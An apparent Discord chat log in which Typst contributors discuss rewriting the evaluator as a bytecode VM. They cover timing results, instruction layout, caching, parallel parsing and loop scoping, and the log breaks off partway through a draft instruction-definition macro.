Now I have other issues, but I'm making progress 😂

sturdy sequoia Jan 22, 2024, 11:48 AM

#

tight glade Exciting times

Thanks ❤️

glad urchin Jan 22, 2024, 11:50 AM

#

tight glade Still the best solution 😂

@sturdy sequoia we're waiting for the fix

sturdy sequoia Jan 22, 2024, 11:51 AM

#

glad urchin <@130737672951037952> we're waiting for the fix

no, it's the price you must pay for fast document compilations 😈

glad urchin Jan 22, 2024, 11:51 AM

#

sturdy sequoia no, it's the price you must pay for fast document compilations 😈

oh ok

#

i can understand that

untold turret Jan 22, 2024, 11:52 AM

#

sturdy sequoia I fixed the scoping issues

you said you'd continue next weekend, probably.

sturdy sequoia Jan 22, 2024, 11:52 AM

#

untold turret you said you'd continue next weekend, probably.

I know but I can't stop

#

who cares that I have a technical interview later today 😂

untold turret Jan 22, 2024, 11:52 AM

#

Very charm🔥

sturdy sequoia Jan 22, 2024, 11:52 AM

#

I am wayyyyy too junior for this position

#

I almost feel bad

sly pecan Jan 22, 2024, 11:53 AM

#

Fake it till you make it

sturdy sequoia Jan 22, 2024, 11:56 AM

#

BTW, removing the instruction deduplication almost halved rust's compile time 💀

#

So it was definitely worth it

#

And I checked another bytecode VM and they do it the way I am now doing it so I'm not re-inventing the wheel

tight glade Jan 22, 2024, 12:52 PM

#

sturdy sequoia who cares that I have a technical interview later today 😂

obsession i cannot sleep

sturdy sequoia Jan 22, 2024, 12:53 PM

#

tight glade **obsession** i cannot sleep

you can't? why 😦

sturdy sequoia Jan 22, 2024, 12:53 PM

#

sly pecan Fake it till you make it

That's the plan, with my good friend ChatGPT 😂

tight glade Jan 22, 2024, 12:53 PM

#

No you can't, because you're obsessed

sturdy sequoia Jan 22, 2024, 12:53 PM

#

tight glade No you can't, because you're obsessed

Oh no, I slept like a baby uwu

#

Could've slept some more tho

tight glade Jan 22, 2024, 12:53 PM

#

Wonderful ❤️❤️❤️

#

You do godly work that's why

sturdy sequoia Jan 22, 2024, 1:14 PM

#

So now there is something wrong with conditions producing a boolean angryeyes

#

I figured it out

#

But now I really must prepare my interview 😂

sturdy sequoia Jan 22, 2024, 4:21 PM

#

Next issue: some captures don't work for reasons unknown 😐

tight glade Jan 22, 2024, 6:54 PM

#

sturdy sequoia Next issue: some captures don't work for reasons unknown 😐

the guy is UNSTIPPABLE

sturdy sequoia Jan 22, 2024, 6:54 PM

#

tight glade the guy is UNSTIPPABLE

UNTYPSTABLE

tight glade Jan 22, 2024, 6:55 PM

#

😎 😎 😎 😎 😎 😎 😎 😎 😎 😎 😎

sturdy sequoia Jan 22, 2024, 6:56 PM

#

no no

#

typstguy

cunning wadi Jan 22, 2024, 6:56 PM

#

sturdy sequoia UNTYPSTABLE

Can't even pandoc Dherse -o Dherse.typ :(

sturdy sequoia Jan 22, 2024, 6:57 PM

#

cunning wadi Can't even `pandoc Dherse -o Dherse.typ` :(

😭

sturdy sequoia Jan 23, 2024, 12:02 AM

#

Ok, so, it can compile: the preface and the introduction

#

getting there!

#

Chapter 1 compiles too 😎

#

Now tablex doesn't compile 😭

#

@glad urchin see what you're doing to me!

glad urchin Jan 23, 2024, 12:14 AM

#

sturdy sequoia <@180813971853410305> see what you're doing to me!

i mean, did it compile in the first place? lol

sturdy sequoia Jan 23, 2024, 12:21 AM

#

Ok, it's improving

sturdy sequoia Jan 23, 2024, 12:37 AM

#

I fixed variable shadowing

#

and now I'm off to bed

#

😴

sturdy sequoia Jan 23, 2024, 4:06 PM

#

It almost compiles the thesis now

#

it fails many iterations in

#

I think my code just found a bug in queries

#

🧐

sturdy sequoia Jan 23, 2024, 4:50 PM

#

@tight glade @sly pecan @glad urchin @left night @feral imp I can now confirm that the new evaluation system is significantly faster, I don't know yet exactly how much faster (I need to do more testing) but at least 3x faster even when taking into account the extra compilation that needs to be performed before eval 🎉

#

🚀

#

And I think that with borrowing and a few other optimizations it might be even faster 😄

sly pecan Jan 23, 2024, 4:51 PM

#

sturdy sequoia <@553622654163353610> <@399269065388195842> <@180813971853410305> <@311948531835...

How big a part of compilation is eval though?

#

I assume compilation as a whole isn't 3x faster

sturdy sequoia Jan 23, 2024, 4:52 PM

#

sly pecan How big a part of compilation is eval though?

In this case I am trying on an eval heavy document while I keep fixing bugs

#

💀

#

Ok, so using the handy-dandy `--timings` argument:

- Before rework: 5.7s, of which 1.2s is layout => eval is 4.5s
- After rework: 2.33s, of which 1.2s is layout => eval is 1.13s

#

Meaning a speedup of almost 4x in eval
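Spelled out, using only the numbers quoted above and treating "eval" as everything that is not layout (a simplification, since that remainder also includes parsing and bytecode compilation), the arithmetic looks like this. The function names are made up for the sketch.

```rust
/// Time left once layout is subtracted, in seconds.
fn eval_time(total: f64, layout: f64) -> f64 {
    total - layout
}

/// How many times faster `after` is compared to `before`.
fn speedup(before: f64, after: f64) -> f64 {
    before / after
}

/// Returns (eval speedup, whole-compile speedup) for the quoted timings.
fn quoted_speedups() -> (f64, f64) {
    let eval_before = eval_time(5.7, 1.2); // 4.5 s
    let eval_after = eval_time(2.33, 1.2); // 1.13 s
    (speedup(eval_before, eval_after), speedup(5.7, 2.33))
}
```

That gives roughly 3.98x for eval alone and roughly 2.45x for the whole run, since the 1.2s of layout is unchanged.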

sly pecan Jan 23, 2024, 4:54 PM

#

is that your thesis?

sturdy sequoia Jan 23, 2024, 4:54 PM

#

These are obviously very rough numbers because compilation is cached across invocations

sturdy sequoia Jan 23, 2024, 4:54 PM

#

sly pecan is that your thesis?

No, it's a second document I'm using for testing

#

My thesis still doesn't compile, but I don't know what the bug is... YET!

feral imp Jan 23, 2024, 6:06 PM

#

4x is nuts.

#

I'd have said 20%-80% percent would be worth it!

sturdy sequoia Jan 23, 2024, 6:28 PM

#

@left night I do think I will end up rewriting it as an array of structs because currently I am quite limited in doing things like "either a register, a constant, a local, or an arg" which leads to way more instructions than needed

#

Instead I could just have a system like OpCode(Flags) being 16 bits where the Opcode is 8 bits and the flags are 8 bits indicating how the arguments work

#

I think that could lead to much faster execution and fewer instructions overall
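A possible shape for that 16-bit word, purely as a sketch: the opcode sits in the high byte and the flags byte spends two bits per operand to say where it lives. The concrete opcodes, the `Source` enum, and the bit layout are all assumptions; the conversation only fixes the 8 + 8 split.

```rust
/// Example opcodes (hypothetical).
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(u8)]
enum Opcode {
    Add = 0,
    Mul = 1,
}

/// Where an operand lives; two flag bits per operand.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(u8)]
enum Source {
    Register = 0,
    Constant = 1,
    Local = 2,
    Arg = 3,
}

impl Opcode {
    fn from_byte(byte: u8) -> Option<Opcode> {
        match byte {
            0 => Some(Opcode::Add),
            1 => Some(Opcode::Mul),
            _ => None,
        }
    }
}

impl Source {
    fn from_bits(bits: u8) -> Source {
        match bits & 0b11 {
            0 => Source::Register,
            1 => Source::Constant,
            2 => Source::Local,
            _ => Source::Arg,
        }
    }
}

/// Packs the opcode into the high byte and the operand kinds into the low byte.
fn encode(op: Opcode, lhs: Source, rhs: Source) -> u16 {
    let flags = (lhs as u8) | ((rhs as u8) << 2);
    ((op as u16) << 8) | flags as u16
}

/// Splits a word back into opcode and operand kinds.
fn decode(word: u16) -> Option<(Opcode, Source, Source)> {
    let op = Opcode::from_byte((word >> 8) as u8)?;
    let flags = word as u8;
    Some((op, Source::from_bits(flags), Source::from_bits(flags >> 2)))
}
```

With this layout a single `Add` opcode covers all sixteen combinations of operand kinds, instead of needing one instruction variant per combination.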

low sapphire Jan 23, 2024, 6:29 PM

#

sturdy sequoia In this case I am trying on an eval heavy document while I keep fixing bugs

does eval heavy mean you actually have to use eval in typst? like mitex does?

sturdy sequoia Jan 23, 2024, 6:34 PM

#

low sapphire does eval heavy mean you actually have to use eval in typst? like mitex does?

no, it means it runs a lot of typst code

#

like you would see using cetz or tablex, or anything that does data processing in general

low sapphire Jan 23, 2024, 6:35 PM

#

ah okay

atomic violet Jan 23, 2024, 6:38 PM

#

sturdy sequoia <@311948531835469827> I do think I will end up rewriting it as an array of struc...

I think you meant "structure of arrays" here, maybe? 🤔

sturdy sequoia Jan 23, 2024, 6:39 PM

#

atomic violet I think you meant "structure of arrays" here, maybe? 🤔

oh yes sorry

#

I'm tired

atomic violet Jan 23, 2024, 6:39 PM

#

is there a reason for it though other than some instructions possibly being longer than they should be?

sturdy sequoia Jan 23, 2024, 6:39 PM

#

atomic violet is there a reason for it though other than some instructions possibly being long...

It saves memory since there is no wasted space

#

It saves cache utilization (for the same reason)

#

It can be faster

atomic violet Jan 23, 2024, 6:40 PM

#

well, it can, but you will need to measure it

sturdy sequoia Jan 23, 2024, 6:40 PM

#

It can save tons of instructions by giving me more freedom in how I am "crafting" the instructions by being able to have more than one value
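To illustrate the memory argument only (whether it is actually faster would need measuring), here is a sketch comparing an enum-based instruction list with a structure-of-arrays layout. The instruction set and the `Program` type are invented for the example.

```rust
/// Array-of-structs style: every element is as large as the biggest variant.
#[allow(dead_code)]
enum Instruction {
    Nop,
    Jump(u32),
    Add(u16, u16, u16),
}

/// Structure-of-arrays style: opcodes and operands live in separate,
/// densely packed arrays.
#[derive(Default)]
struct Program {
    opcodes: Vec<u8>,
    operands: Vec<u16>,
}

/// Number of `u16` operands each opcode consumes (0 = Nop, 1 = Jump, 2 = Add).
fn operand_count(opcode: u8) -> usize {
    match opcode {
        0 => 0,
        1 => 2, // a 32-bit target split into two words
        _ => 3,
    }
}

impl Program {
    fn push(&mut self, opcode: u8, operands: &[u16]) {
        debug_assert_eq!(operands.len(), operand_count(opcode));
        self.opcodes.push(opcode);
        self.operands.extend_from_slice(operands);
    }

    /// Payload size in bytes, ignoring `Vec` bookkeeping.
    fn byte_len(&self) -> usize {
        self.opcodes.len() + 2 * self.operands.len()
    }

    /// Operands of instruction `index`. A real interpreter would keep a
    /// running operand cursor instead of rescanning from the start.
    fn operands_of(&self, index: usize) -> &[u16] {
        let start: usize = self.opcodes[..index]
            .iter()
            .map(|&op| operand_count(op))
            .sum();
        &self.operands[start..start + operand_count(self.opcodes[index])]
    }
}
```

For a `Nop`, a `Jump`, and an `Add`, the packed form needs 13 bytes of payload, while three `Instruction` values take at least 18 bytes because each one is padded to the size of the largest variant.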

sturdy sequoia Jan 23, 2024, 6:40 PM

#

atomic violet well, it can, but you will need to measure it

indeed

atomic violet Jan 23, 2024, 6:40 PM

#

the problem with SoA is that it's harder to support, and here I don't see much reason to use it

#

instructions are executed in sequential order anyway, so you will get good cache occupancy thanks to prefetching either way

sturdy sequoia Jan 23, 2024, 6:41 PM

#

atomic violet the problem with SoA is that it's harder to support, and here I don't see much r...

If I go the SoA route, I'll write a proc-macro to generate the instruction and builders for them, that way it's not too error-prone

atomic violet Jan 23, 2024, 6:41 PM

#

even if instructions are like 32 bytes long

sturdy sequoia Jan 23, 2024, 6:41 PM

#

atomic violet even if instructions are like 32 bytes long

That's true, but I would ideally like to keep them as short as possible to get the most cache occupancy possible

atomic violet Jan 23, 2024, 6:42 PM

#

well, L1 is 32 kb anyway - that's pretty big, enough to fit every hotspot for sure

sturdy sequoia Jan 23, 2024, 6:43 PM

#

atomic violet well, L1 is 32 kb anyway - that's pretty big, enough to fit every hotspot for su...

Well that's platform dependent :-p

atomic violet Jan 23, 2024, 6:43 PM

#

thing is, SoA is usually implemented if you can take the advantage of parallelism, because you will be able to work with multiple objects anyway thanks to SIMD

#

and here it is not the case

#

well

#

unless you are going to implement some kind of SIMD instruction parsing...

sturdy sequoia Jan 23, 2024, 6:44 PM

#

atomic violet unless you are going to implement some kind of SIMD instruction parsing...

no lol

atomic violet Jan 23, 2024, 6:44 PM

#

which would be kind of cool but also too cool

sturdy sequoia Jan 23, 2024, 6:44 PM

#

OUT OF ORDER EXECUTION

#

😂

atomic violet Jan 23, 2024, 6:44 PM

#

lmao

#

anyway, you can try, it would be interesting to see the difference for sure

#

how are constants stored? is it like a global (for every function/block of code/something) array which you can index within some instructions?

sturdy sequoia Jan 23, 2024, 6:47 PM

#

atomic violet how are constants stored? is it like a global (for every function/block of code/...

it's module-local or function-local (depending if you're in a module or a function, function always have their own copies of everything)

atomic violet Jan 23, 2024, 6:49 PM

#

ok, makes sense... I was going to say that if you want to improve code cache occupancy it might be worth considering improving cache occupancy of something else instead (making layout of everything more predictable will make predictable layout of code even more predictable), but I suppose it's not as simple as it may seem🤔

#

anyway, do your thing and try to compensate for carbon emissions of your compilations, I suppose 😅

sturdy sequoia Jan 23, 2024, 6:51 PM

#

What I want is mostly to get a first draft that works, and then try different improvements mostly

tight glade Jan 23, 2024, 6:52 PM

#

sturdy sequoia I think my code just found a bug in queries

nice

tight glade Jan 23, 2024, 6:52 PM

#

sturdy sequoia <@553622654163353610> <@399269065388195842> <@180813971853410305> <@311948531835...

omg

sturdy sequoia Jan 23, 2024, 6:54 PM

#

tight glade nice

it did not, queries found a bug in my code 😂

left night Jan 23, 2024, 6:59 PM

#

@sturdy sequoia fun memories. this was the "first" content rework, which moved from an enum to something pretty close to what we have now (but obviously with way less features). the dynamic Attr thing only came later. this goes to show how far-reaching a single bad design decision is.

sturdy sequoia Jan 23, 2024, 7:11 PM

#

left night <@130737672951037952> fun [memories](<https://github.com/typst/typst/commit/37ac...

Actually with hindsight I think it made a lot of sense, especially when you consider that you didn't have the proc-macro at the time

tight glade Jan 23, 2024, 9:04 PM

#

What's the bad design decision here?

sturdy sequoia Jan 23, 2024, 9:07 PM

#

tight glade What's the bad design decision here?

moving to dyn structs

#

the old Content system with an EcoVec<Attr> to store fields

tight glade Jan 23, 2024, 9:08 PM

#

Hmmm 🤔

sly pecan Jan 23, 2024, 9:20 PM

#

sturdy sequoia OUT OF ORDER EXECUTION

Speculative execution

untold turret Jan 23, 2024, 11:01 PM

#

sturdy sequoia Ok, so using the handy-dandy `--timings` arguments: - Before rework: 5.7s of whi...

cold compilation? What about incrementally?

sturdy sequoia Jan 23, 2024, 11:02 PM

#

untold turret cold compilation? What about incrementally?

I can't say just yet, I'll try once I have a larger doc!

#

But eval speed seems to be really improved

#

incrementally it should be even higher 🤞

#

I'm still having some issues in tablex and running tests is actually surprisingly hard (because spans don't match for... reasons)

untold turret Jan 23, 2024, 11:05 PM

#

Have you already applied comemo, or is this a result of executing bytecode without caching?

sturdy sequoia Jan 23, 2024, 11:06 PM

#

untold turret Have you already applied comemo, or this is a result of executing bytecode witho...

yes, there is already memoization for closure calls and module loading

#

but there is no caching dedicated to compilation (yet)

untold turret Jan 23, 2024, 11:09 PM

#

You have been announcing 2x, 3x, 4x performance improvements again and again. There should be at one another science

sturdy sequoia Jan 23, 2024, 11:10 PM

#

untold turret You have been announced 2x, 3x, 4x performance improvement again and again. Ther...

Well it's been very gradual 😄

#

Small gains x infinity = big gains 😄

#

I think it's quite nice because I have also made bytecode compilation part of the timings

glad urchin Jan 23, 2024, 11:12 PM

#

sturdy sequoia I'm still having some issues in tablex and running tests is actually surprising...

proof that tablex is great to extensively test eval

#

😂

sturdy sequoia Jan 23, 2024, 11:13 PM

#

glad urchin proof that tablex is great to extensively test eval

yes 😂

glad urchin Jan 23, 2024, 11:13 PM

#

sturdy sequoia I think it's quite nice because I have also made bytecode compilation part of t...

Q: is bytecode compilation memoized as well?

sturdy sequoia Jan 23, 2024, 11:13 PM

#

glad urchin Q: is bytecode compilation memoized as well?

no

#

but eventually it will be of course

glad urchin Jan 23, 2024, 11:13 PM

#

i see

untold turret Jan 23, 2024, 11:13 PM

#

The thesis and, the table package.

sturdy sequoia Jan 23, 2024, 11:14 PM

#

I also added module eval as a thing, I just need to add closure compilation

glad urchin Jan 23, 2024, 11:15 PM

#

cuz i often see some talks about the idea of using a JIT but I think that's going perhaps way too far
some (comparatively) simple bytecode memoization could perhaps be more suitable

#

if that makes sense

sturdy sequoia Jan 23, 2024, 11:15 PM

#

I generally agree, I think the gains we'll have here will already be awesome

untold turret Jan 23, 2024, 11:16 PM

#

sturdy sequoia I think it's quite nice because I have also made bytecode compilation part of t...

Is bytecode serializable? I think we can have a /target directory like rust storing black hole of bytecode now. 😂

sturdy sequoia Jan 23, 2024, 11:17 PM

#

untold turret Is bytecode serializable? I think we can have a /target directory like rust stor...

it would be trivially serializable 😂

glad urchin Jan 23, 2024, 11:17 PM

#

53 GiB typst-target folder

sturdy sequoia Jan 23, 2024, 11:17 PM

#

it's just a BUNCH of u16s

glad urchin Jan 23, 2024, 11:17 PM

#

i mean what can i say

#

it would probably speed up compilation

#

who doesnt want that

sturdy sequoia Jan 23, 2024, 11:18 PM

#

Really depends how long it takes to compile to bytecode

glad urchin Jan 23, 2024, 11:18 PM

#

fair

sturdy sequoia Jan 23, 2024, 11:19 PM

#

Like compiling most of the bytecode in my thesis takes around 20ms

#

and my thesis is long and includes tablex 😂

glad urchin Jan 23, 2024, 11:19 PM

#

sorry but 20ms is too long

#

i want 0

sturdy sequoia Jan 23, 2024, 11:19 PM

#

and I think that parsing and compilation could be deferred to multiple threads 😎

cunning wadi Jan 23, 2024, 11:19 PM

#

glad urchin i want 0

just use 0.10.0

glad urchin Jan 23, 2024, 11:19 PM

#

cunning wadi just use 0.10.0

darn im really stupid

#

thanks

cunning wadi Jan 23, 2024, 11:20 PM

#

happy to help 👍

glad urchin Jan 23, 2024, 11:20 PM

#

im gonna make a patch for typst 0.[version with bytecode].0 which just replaces all Compile implementations with a mock

#

that should help

untold turret Jan 23, 2024, 11:22 PM

#

sturdy sequoia it would be trivially serializable 😂

And can we also say that the results of evaluation are safe to cache on disk? We were imagining a persistent comemo cache, but things like pointers prevent it.

cunning wadi Jan 23, 2024, 11:22 PM

#

from what I saw, yes

sturdy sequoia Jan 23, 2024, 11:23 PM

#

untold turret And also we can say that result of evaluation are safe to cached in disk? We wer...

Well you could cache them but that would require serializing (which is slow)

#

but for bytecode then it's trivial because there are no pointers

#

everything is done with IDs into shared arrays

#

like ConstId for constants, StringID, etc.
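As a sketch of why pointer-free bytecode is easy to persist: if the instruction stream really is a flat sequence of `u16` words whose operands are indices such as `ConstId`, writing it out is a byte-for-byte copy. The little-endian encoding and the function names below are assumptions, not the project's actual format.

```rust
/// Flattens the instruction words into little-endian bytes.
fn to_bytes(code: &[u16]) -> Vec<u8> {
    code.iter().flat_map(|word| word.to_le_bytes()).collect()
}

/// Rebuilds the instruction words; `None` if the input has an odd length.
fn from_bytes(bytes: &[u8]) -> Option<Vec<u16>> {
    if bytes.len() % 2 != 0 {
        return None;
    }
    Some(
        bytes
            .chunks_exact(2)
            .map(|pair| u16::from_le_bytes([pair[0], pair[1]]))
            .collect(),
    )
}
```

The constant and string tables that the IDs point into would still need their own serialization, which is where the real cost would be.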

untold turret Jan 23, 2024, 11:25 PM

#

sturdy sequoia Well you could cache them but that would require serializing (which is slow)

Some of them are valuable to persist; I'm referring at least to @onyx furnace's large set of plugin calls in his 2500-page document.

sturdy sequoia Jan 23, 2024, 11:25 PM

#

untold turret Some of them, I refer to at least @onyx furnace's large set of plugin ...

true, but in the case of @onyx furnace's doc, I think moving to wasmtime would already be a huge improvement

#

I have tested it and it like halved the compilation time

cunning wadi Jan 23, 2024, 11:26 PM

#

untold turret Some of them, I refer to at least @onyx furnace's large set of plugin ...

maybe there could be a way of timing calls to check how long they each take and only keeping those that ran very long

#

(doesn't have to be time specifically, could also just be counting number of instructions executed)

sturdy sequoia Jan 23, 2024, 11:27 PM

#

cunning wadi maybe there could be a way of timing calls to check how long they each take and ...

the problem isn't that the individual calls are slow, it's that there are so goddamn many of them 😂

#

That's why I've been thinking of "deferred" calls, where the value is only known when it's needed

#

But of course that would require plugins to be Send + Sync
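A rough sketch of what a "deferred" call could look like, assuming the work is simply started on another thread and only joined when the value is first read. `Deferred` and `FakePlugin` are made-up names for illustration, not Typst types. Sharing the plugin through an `Arc` across threads is what brings in the `Send + Sync` requirement.

```rust
use std::sync::Arc;
use std::thread::{self, JoinHandle};

/// Hypothetical deferred value: computed in the background, waited on lazily.
struct Deferred<T> {
    handle: Option<JoinHandle<T>>,
    value: Option<T>,
}

impl<T: Send + 'static> Deferred<T> {
    /// `thread::spawn` requires the closure (and everything it captures) to be `Send`.
    fn spawn<F>(call: F) -> Self
    where
        F: FnOnce() -> T + Send + 'static,
    {
        Deferred { handle: Some(thread::spawn(call)), value: None }
    }

    /// Blocks only the first time, while the background call is still running.
    fn get(&mut self) -> &T {
        if let Some(handle) = self.handle.take() {
            self.value = Some(handle.join().expect("deferred call panicked"));
        }
        self.value.as_ref().expect("value is set once the handle is joined")
    }
}

/// Stand-in for a plugin; it must be `Send + Sync` to sit behind a shared `Arc`.
struct FakePlugin {
    factor: u64,
}

impl FakePlugin {
    fn call(&self, input: u64) -> u64 {
        input * self.factor
    }
}

fn main() {
    let plugin = Arc::new(FakePlugin { factor: 3 });
    // Start many small calls up front; none of them blocks the caller yet.
    let mut calls: Vec<Deferred<u64>> = (0..4)
        .map(|i| {
            let plugin = Arc::clone(&plugin);
            Deferred::spawn(move || plugin.call(i))
        })
        .collect();
    // The values are only waited on when they are actually needed.
    let total: u64 = calls.iter_mut().map(|call| *call.get()).sum();
    assert_eq!(total, 18);
}
```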

#

Anyway, I'm off to bed ❤️

cunning wadi Jan 23, 2024, 11:28 PM

#

that sounds like a good idea for me as well

untold turret Jan 23, 2024, 11:28 PM

#

I think we will get further improvement. But you are right, there are other ways to improve it, and it is already fast enough even without a persistent cache.

untold turret Jan 23, 2024, 11:29 PM

#

sturdy sequoia Anyway, I'm off to bed ❤️

Another day on #1176509648707256370.

onyx furnace Jan 24, 2024, 2:02 AM

#

sturdy sequoia and I think that parsing and compilation could be deferred to multiple threads ...

will this make it faster? i think this is not parallelizable.

onyx furnace Jan 24, 2024, 2:03 AM

#

sturdy sequoia true, but in the case of @onyx furnace's doc, I think moving to wasmtime...

yes. in that case, time is used in plugin calls

onyx furnace Jan 24, 2024, 2:04 AM

#

sturdy sequoia

the flamegraph looks amazing

#

may i know which doc you use for testing? i guess thesis, tablex doc, cetz doc should be "eval-heavy" ones?

sturdy sequoia Jan 24, 2024, 7:33 AM

#

onyx furnace will this make it faster? i think this is not parallelizable.

It's more that we could parse all of the files in your project all at once

sturdy sequoia Jan 24, 2024, 7:34 AM

#

onyx furnace the flamegraph looks amazing

yes I am soooooo happy about the --timings feature and how it came out. Thank you very very much to you and @untold turret for the idea of making it compatible with chrome traces! It's awesome 😄

left night Jan 24, 2024, 7:34 AM

#

sturdy sequoia It's more that we could parse all of the files in your project all at once

only if import/include is required to have static paths or if we do it optimistically for those that are static

#

but overall yes

sturdy sequoia Jan 24, 2024, 7:35 AM

#

onyx furnace may i know which doc you use for testing? i guess thesis, tablex doc, cetz doc s...

Yes of course, I am using several ones, but my "workhorse" for this work is a mandelbrot. My thesis doesn't compile yet, I am slowly working through the automated tests to figure out what is wrong 😐

left night Jan 24, 2024, 7:35 AM

#

but we potentially also eval shared leafs twice unnecessarily

sturdy sequoia Jan 24, 2024, 7:35 AM

#

left night only if import/include is required to have static paths or if we do it optimisti...

In the end what I find funny is that parsing takes significantly longer than compilation which I was not expecting 😂

left night Jan 24, 2024, 7:36 AM

#

and parsing we can notably not do completely in parallel

#

since we obviously need to find those imports

sturdy sequoia Jan 24, 2024, 7:37 AM

#

true true, but perhaps the parser could automatically add "static" imports to a big list of files that are "in the path" so-to-speak for parsing and compiling in a deferred way?
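One way to picture the "optimistic" variant is to parse in waves: everything discovered so far is parsed in parallel, and the static imports found become the next wave. The sketch below assumes a toy line scanner in place of the real parser; `static_imports` and `parse_project` are hypothetical helpers, and imports whose path is not a string literal are simply skipped.

```rust
use std::collections::{HashMap, HashSet};
use std::thread;

/// Toy stand-in for a parser: returns paths of imports written as string literals.
/// Anything else (e.g. `#import some_variable`) is treated as dynamic and ignored.
fn static_imports(source: &str) -> Vec<String> {
    source
        .lines()
        .filter_map(|line| line.trim().strip_prefix("#import \""))
        .filter_map(|rest| rest.split('"').next())
        .map(str::to_owned)
        .collect()
}

/// Parses the project in waves and returns every file that was reached.
fn parse_project(files: &HashMap<String, String>, root: &str) -> HashSet<String> {
    let mut seen: HashSet<String> = HashSet::from([root.to_owned()]);
    let mut wave = vec![root.to_owned()];
    while !wave.is_empty() {
        // All files of the current wave are scanned on their own threads.
        let found: Vec<Vec<String>> = thread::scope(|s| {
            let handles: Vec<_> = wave
                .iter()
                .map(|path| {
                    s.spawn(move || {
                        files.get(path).map(|src| static_imports(src)).unwrap_or_default()
                    })
                })
                .collect();
            handles
                .into_iter()
                .map(|handle| handle.join().expect("parser thread panicked"))
                .collect()
        });
        // Only files not seen before go into the next wave, so shared leaves run once.
        wave = found
            .into_iter()
            .flatten()
            .filter(|path| seen.insert(path.clone()))
            .collect();
    }
    seen
}

fn main() {
    let files = HashMap::from([
        ("main.typ".to_owned(), "#import \"a.typ\": x\n#import \"b.typ\"\n#import dynamic".to_owned()),
        ("a.typ".to_owned(), "#import \"b.typ\"".to_owned()),
        ("b.typ".to_owned(), "= Leaf".to_owned()),
    ]);
    let parsed = parse_project(&files, "main.typ");
    assert_eq!(parsed.len(), 3);
}
```

As noted above, the imports still have to be found first, so the parallelism only exists within a wave and not across the whole project.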

#

It's no big deal either way, it doesn't account for very much anyway

#

But I think it's a "low hanging fruit" for making eval faster

sturdy sequoia Jan 24, 2024, 7:39 AM

#

sturdy sequoia But I think it's a "low hanging fruit" for making eval faster

slightly faster *

#

@left night BTW I hope you don't mind that I am looking into eval but I like these "bigger" projects, I find them really rewarding to work on and with all of the reworks you're doing in other parts of the codebase I didn't want to cause trouble there so I figured eval was a good place to work on to cause as little friction as possible on your own work

#

It also has really motivated me to work on Typst again ❤️

#

Really sorry for being a bit harsh with the revoke thing the other day 😐

left night Jan 24, 2024, 7:42 AM

#

Don't worry about it, it's already forgotten

#

It's very cool that you're taking this bytecode thing on

onyx furnace Jan 24, 2024, 7:58 AM

#

sturdy sequoia Yes of course, I am using several ones, but my "workhorse" for this work is a ma...

mandelbrot is definitely very scripting-heavy! nice for this task😂

sturdy sequoia Jan 24, 2024, 8:05 AM

#

onyx furnace mandelbrot is definitely very scripting-heavy! nice for this task😂

indeed 😂

#

I wanted something that would really test eval more than anything else

sturdy sequoia Jan 24, 2024, 2:07 PM

#

@left night are destructure patterns in for loop supposed to be defined within the parent's scope? like this:

for i in range(10) { ... }

// Is `i` valid here?
i

#

or should i remain scoped to the loop?

#

I think it should be the latter but I'm curious what you think

feral imp Jan 24, 2024, 2:07 PM

#

Former is how it is done in R, so.... I don't think so.

sturdy sequoia Jan 24, 2024, 2:08 PM

#

feral imp Former is how it is done in R, so.... I don't think so.

Aren't you supposed to like R? 😂

feral imp Jan 24, 2024, 2:08 PM

#

Off-topic.

sturdy sequoia Jan 24, 2024, 2:09 PM

#

feral imp Off-topic.

ferrisBigBrain

left night Jan 24, 2024, 2:11 PM

#

sturdy sequoia @left night are destructure patterns in for loop supposed to be define...

It should remain scoped to the loop (that's also how it works on main from a quick test).

sturdy sequoia Jan 24, 2024, 2:12 PM

#

left night It should remain scoped to the loop (that's also how it works on main from a qui...

yes, I figured it's just a bit ugly with the way my compiler currently works

#

I'll fix that 😉
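A small sketch of how a compiler might keep the loop variable scoped to the loop, assuming a plain stack of name-to-slot maps. `Scopes` and its methods are hypothetical and not the compiler's real data structure.

```rust
use std::collections::HashMap;

/// Minimal scope stack resolving names to slots (illustrative only).
struct Scopes {
    stack: Vec<HashMap<String, usize>>,
    next_slot: usize,
}

impl Scopes {
    fn new() -> Self {
        Scopes { stack: vec![HashMap::new()], next_slot: 0 }
    }

    /// Called when entering a block such as a `for` loop.
    fn enter(&mut self) {
        self.stack.push(HashMap::new());
    }

    /// Called when leaving the block; the root scope is never popped.
    fn exit(&mut self) {
        if self.stack.len() > 1 {
            self.stack.pop();
        }
    }

    /// Declares a name in the innermost scope and returns its slot.
    fn declare(&mut self, name: &str) -> usize {
        let slot = self.next_slot;
        self.next_slot += 1;
        self.stack
            .last_mut()
            .expect("root scope always exists")
            .insert(name.to_owned(), slot);
        slot
    }

    /// Looks a name up from the innermost scope outwards.
    fn resolve(&self, name: &str) -> Option<usize> {
        self.stack.iter().rev().find_map(|scope| scope.get(name).copied())
    }
}

fn main() {
    let mut scopes = Scopes::new();
    scopes.declare("x");
    scopes.enter(); // entering `for i in range(10) { ... }`
    scopes.declare("i");
    assert!(scopes.resolve("i").is_some());
    assert!(scopes.resolve("x").is_some());
    scopes.exit(); // leaving the loop drops `i`
    assert!(scopes.resolve("i").is_none());
}
```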

untold turret Jan 24, 2024, 2:20 PM

#

There could be a reference (specification) interpreter for Typst that doesn't apply many optimizations, and the answer is whatever it produces.

sturdy sequoia Jan 24, 2024, 4:36 PM

#

@left night what do you think of a macro like this for creating instructions:

#


isr! {
    Add -> Register | Local {
        lhs: Register | Constant | Local | Global | Param | Capture,
        rhs: Register | Constant | Local | Global | Param | Capture,
    } => |add| {
        std::ops::add(add.lhs(), add.rhs())
    }

    #[scope]
    Iter {
        value: Register | Constant | Local | Global | Param | Capture,
        target: Iterator,
    }

    #[flow]
    And {
        lhs: Register | Constant | Local | Global | Param | Capture,
        rhs: Register | Constant | Local | Global | Param | Capture,
        target: Jump,
    } => |and, cf| {
        let lhs = and.lhs().cast::<bool>()?;
        if !lhs {
            cf.jump(and.target());

            Value::None
        } else {
            let rhs = and.rhs().cast::<bool>()?;

            Value::Bool(lhs && rhs)
        }
    }

    #[flow]
    If {
        condition: Register | Constant | Local | Global | Param | Capture,
        then: Jump,
        else: Jump | None,
    } => |if, cf| {
        if if.condition().cast::<bool>()? {
            cf.jump(if.then())
        } else {
            cf.jump(if.else())
        }
    }

    #[flow]
    #[scope(consume)]
    Label {
        label: Jump,
        pop: bool,
    } => |label| {
        if label.pop() {
            label.scope().pop()
        }
    }

    #[flow]
    Next -> Register | Local {
        iter: Iterator,
